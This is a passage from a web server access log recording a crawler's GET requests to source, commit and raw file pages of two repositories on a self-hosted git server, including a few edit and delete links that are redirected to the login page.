[Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/tsconfig.json" [Client 216.73.216.188] [Length 9863] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" [Client 216.73.216.188] [Length 14338] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components" [Client 216.73.216.188] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/database.sqlite" [Client 216.73.216.188] [Length 10149] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/DOCKER_GUIDE.md" [Client 216.73.216.188] [Length 15931] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/README.md" [Client 216.73.216.188] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py?display=rendered" [Client 216.73.216.188] [Length 10972] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude?display=source" [Client 216.73.216.188] [Length 15324] [Gzip 4.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/app.js?display=rendered" [Client 216.73.216.188] [Length 11001] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services" [Client 216.73.216.188] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Services.tsx" [Client 216.73.216.188] [Length 14647] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/script.js?display=rendered" [Client 216.73.216.188] [Length 11195] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/metadata.json" [Client 216.73.216.188] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 216.73.216.188] [Length 7694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 216.73.216.188] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/css" [Client 216.73.216.188] [Length 10121] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/database.sqlite" [Client 216.73.216.188] [Length 159744] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include" [Client 216.73.216.188] [Length 10324] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/tsconfig.json" [Client 216.73.216.188] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/README.md?display=source" [Client 216.73.216.188] [Length 11759] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/start.sh" [Client 216.73.216.188] [Length 14913] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/README.md" [Client 216.73.216.188] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html" [Client 216.73.216.188] [Length 10323] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components" [Client 216.73.216.188] [Length 10563] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/metadata.json" [Client 216.73.216.188] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/tsconfig.json?display=source" [Client 216.73.216.188] [Length 11869] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/README.md" [Client 216.73.216.188] [Length 13321] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/package.json?display=rendered" [Client 216.73.216.188] [Length 10877] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py" [Client 216.73.216.188] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/types.ts" [Client 216.73.216.188] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3?display=rendered" [Client 216.73.216.188] [Length 11030] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py" [Client 216.73.216.188] [Length 1922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/metadata.json?display=source" [Client 216.73.216.188] [Length 11280] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/App.tsx?display=rendered" [Client 216.73.216.188] [Length 10869] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/tsconfig.json?display=rendered" [Client 216.73.216.188] [Length 10867] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data" [Client 216.73.216.188] [Length 10754] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/components/Services.tsx" -[15/Feb/2026:13:17:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/components/About.tsx" -[15/Feb/2026:13:17:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 14844] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets" [Client 216.73.216.188] [Length 10897] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js" [Client 216.73.216.188] [Length 10086] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/ChatBot.tsx?display=source" [Client 216.73.216.188] [Length 15831] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/QUICKSTART.md?display=rendered" [Client 216.73.216.188] [Length 12767] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker?display=rendered" [Client 216.73.216.188] [Length 16001] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/components/Services.tsx" -[15/Feb/2026:13:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site" [Client 216.73.216.188] [Length 9967] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host" [Client 216.73.216.188] [Length 10800] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude?display=rendered" [Client 216.73.216.188] [Length 10979] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/claude.md" [Client 216.73.216.188] [Length 9924] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 15580] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/claude.md" [Client 216.73.216.188] [Length 4068] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/js/i18n.js" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/README.md?display=rendered" [Client 216.73.216.188] [Length 11323] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/js/i18n.js" -[15/Feb/2026:13:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/css/style.css" [Client 216.73.216.188] [Length 12667] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/App.tsx" [Client 216.73.216.188] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcConnectionTest%2Fobj%2FDebug" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services" [Client 216.73.216.188] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data" [Client 216.73.216.188] [Length 10703] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/tsconfig.json?display=rendered" [Client 216.73.216.188] [Length 10873] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/css" [Client 216.73.216.188] [Length 10110] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images" [Client 216.73.216.188] [Length 10163] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets" [Client 216.73.216.188] [Length 9858] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/database.sqlite?display=rendered" [Client 216.73.216.188] [Length 10883] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/tsconfig.json" [Client 216.73.216.188] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/metadata.json?display=rendered" [Client 216.73.216.188] [Length 10871] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/README.md" [Client 216.73.216.188] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/App.tsx" [Client 216.73.216.188] 